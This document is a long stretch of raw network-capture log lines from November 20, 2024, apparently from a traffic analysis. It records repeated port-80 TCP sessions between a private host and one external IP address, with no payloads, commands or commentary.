                                                                    Nov 20, 2024 07:57:38.245454073 CET804921094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:38.245541096 CET4921080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:38.250439882 CET804921094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:38.955806971 CET804921094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:38.955955029 CET4921080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:38.956038952 CET804921094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:38.956111908 CET4921080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:38.960823059 CET804921094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:39.088648081 CET4921180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:39.093550920 CET804921194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:39.093662024 CET4921180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:39.095318079 CET4921180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:39.100122929 CET804921194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:39.100303888 CET4921180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:39.105119944 CET804921194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:39.954087973 CET804921194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:39.954121113 CET804921194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:39.954333067 CET4921180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:39.954333067 CET4921180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:39.959249973 CET804921194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:40.086687088 CET4921280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:40.092782021 CET804921294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:40.092885017 CET4921280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:40.094630957 CET4921280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:40.099416018 CET804921294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:40.099524021 CET4921280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:40.106137037 CET804921294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:40.816035032 CET804921294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:40.816262960 CET804921294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:40.816303015 CET4921280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:40.816354036 CET4921280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:40.821147919 CET804921294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:40.946070910 CET4921380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:40.950937986 CET804921394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:40.951020956 CET4921380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:40.952683926 CET4921380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:40.957457066 CET804921394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:40.957521915 CET4921380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:40.962294102 CET804921394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:41.675704002 CET804921394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:41.675839901 CET804921394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:41.675987959 CET4921380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:41.675987959 CET4921380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:41.680887938 CET804921394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:41.821567059 CET4921480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:41.826435089 CET804921494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:41.826534986 CET4921480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:41.828788042 CET4921480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:41.834096909 CET804921494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:41.834156990 CET4921480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:41.839046955 CET804921494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:42.543483973 CET804921494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:42.543601990 CET804921494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:42.543643951 CET4921480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:42.543680906 CET4921480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:42.548513889 CET804921494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:42.679052114 CET4921580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:42.683909893 CET804921594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:42.683989048 CET4921580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:42.685653925 CET4921580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:42.690778971 CET804921594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:42.690841913 CET4921580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:42.695668936 CET804921594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:43.544902086 CET804921594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:43.545093060 CET804921594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:43.545186043 CET4921580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:43.545250893 CET4921580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:43.550060987 CET804921594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:43.674154043 CET4921680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:43.679092884 CET804921694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:43.679163933 CET4921680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:43.680879116 CET4921680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:43.686954021 CET804921694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:43.687015057 CET4921680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:43.691971064 CET804921694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:44.541507006 CET804921694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:44.541532993 CET804921694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:44.541693926 CET4921680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:44.541693926 CET4921680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:44.546679020 CET804921694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:44.675165892 CET4921780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:44.680048943 CET804921794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:44.680143118 CET4921780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:44.681811094 CET4921780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:44.686671019 CET804921794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:44.686743021 CET4921780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:44.691601992 CET804921794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:45.533421993 CET804921794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:45.533689022 CET4921780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:45.533850908 CET804921794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:45.533902884 CET4921780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:45.538503885 CET804921794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:45.671566010 CET4921880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:45.676475048 CET804921894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:45.676553011 CET4921880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:45.678222895 CET4921880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:45.683080912 CET804921894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:45.683161974 CET4921880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:45.687995911 CET804921894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:46.391887903 CET804921894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:46.392055035 CET804921894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:46.392081976 CET4921880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:46.392134905 CET4921880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:46.397053957 CET804921894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:46.560368061 CET4921980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:46.565263987 CET804921994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:46.565339088 CET4921980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:46.567030907 CET4921980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:46.571842909 CET804921994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:46.572052002 CET4921980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:46.576961994 CET804921994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:47.435107946 CET804921994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:47.435297966 CET4921980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:47.435528994 CET804921994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:47.435584068 CET4921980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:47.440139055 CET804921994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:47.613591909 CET4922080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:47.618675947 CET804922094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:47.618752956 CET4922080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:47.620480061 CET4922080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:47.625364065 CET804922094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:47.625431061 CET4922080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:47.630283117 CET804922094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:48.350254059 CET804922094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:48.350375891 CET4922080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:48.350524902 CET804922094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:48.350577116 CET4922080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:48.355330944 CET804922094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:48.526076078 CET4922180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:48.531033993 CET804922194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:48.531141043 CET4922180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:48.532846928 CET4922180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:48.537797928 CET804922194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:48.537909031 CET4922180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:48.542763948 CET804922194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:49.387171030 CET804922194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:49.387295961 CET4922180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:49.387474060 CET804922194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:49.387527943 CET4922180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:49.392165899 CET804922194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:49.524877071 CET4922280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:49.530566931 CET804922294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:49.530647039 CET4922280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:49.532310009 CET4922280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:49.537178993 CET804922294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:49.537252903 CET4922280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:49.542315006 CET804922294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:50.396709919 CET804922294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:50.396853924 CET804922294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:50.396868944 CET4922280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:50.397007942 CET4922280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:50.401731968 CET804922294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:50.528292894 CET4922380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:50.534405947 CET804922394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:50.534495115 CET4922380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:50.536369085 CET4922380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:50.541321039 CET804922394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:50.541403055 CET4922380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:50.546330929 CET804922394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:51.399991989 CET804922394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:51.400156021 CET804922394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:51.400249004 CET4922380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:51.400294065 CET4922380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:51.405119896 CET804922394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:51.538554907 CET4922480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:51.543478966 CET804922494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:51.543617964 CET4922480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:51.545281887 CET4922480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:51.550121069 CET804922494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:51.550184965 CET4922480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:51.555028915 CET804922494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:52.414423943 CET804922494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:52.414485931 CET804922494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:52.414699078 CET4922480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:52.414699078 CET4922480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:52.419599056 CET804922494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:52.559758902 CET4922580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:52.564730883 CET804922594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:52.564850092 CET4922580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:52.566518068 CET4922580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:52.571398973 CET804922594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:52.571474075 CET4922580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:52.576448917 CET804922594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:53.412801027 CET804922594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:53.412877083 CET804922594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:53.412939072 CET4922580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.412986994 CET4922580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.417983055 CET804922594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:53.553678989 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.558686972 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:53.558801889 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.560519934 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.565388918 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:53.565464020 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.570380926 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.297231913 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.297260046 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.297504902 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.297504902 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.302370071 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.446928024 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.451946020 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.452079058 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.453720093 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.458606005 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.459147930 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.464092016 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.163341045 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.163491011 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.163738966 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.163969040 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.168792963 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.304810047 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.309830904 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.309921026 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.311486006 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.316337109 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.316399097 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.321259022 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.037281036 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.037415981 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.037599087 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.037599087 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.042606115 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.180123091 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.185132980 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.185201883 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.186849117 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.191732883 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.191792965 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.196638107 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.912216902 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.912318945 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.912734985 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.912786961 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.917175055 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.045027018 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.050061941 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.050148010 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.051752090 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.056822062 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.056886911 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.061942101 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.913125992 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.913162947 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.913305044 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.913352966 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.919025898 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.051259995 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.056250095 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.056476116 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.058877945 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.063740015 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.063832045 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.069585085 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.906354904 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.907004118 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.907092094 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.918458939 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.925815105 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:59.301301003 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:59.306411982 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:59.306633949 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:59.309000969 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:59.314918041 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:59.315018892 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:59.320920944 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.178472996 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.178522110 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.178852081 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.178852081 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.184000015 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.392573118 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.397557974 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.397664070 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.401304960 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.406255007 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.406323910 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.411164999 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.249268055 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.249408960 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.250149012 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.250323057 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.254920006 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.390955925 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.395924091 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.396099091 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.397597075 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.402462006 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.402549982 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.407617092 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.252270937 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.252424955 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.252445936 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.252480030 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.257306099 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.399182081 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.404226065 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.404335976 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.405973911 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.410881996 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.410938978 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.415743113 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.142828941 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.143017054 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.143132925 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.143132925 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.147969007 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.269989967 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.275120020 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.275218964 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.276879072 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.281763077 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.281827927 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.286669970 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.012312889 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.012398958 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.012582064 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.012582064 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.017515898 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.141715050 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.146780014 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.146848917 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.148475885 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.153599024 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.153650999 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.158505917 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.015336037 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.015654087 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.015827894 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.015867949 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.020538092 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.158478022 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.163924932 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.164001942 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.165608883 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.170644999 CET804923894.156.177.41192.168.2.22
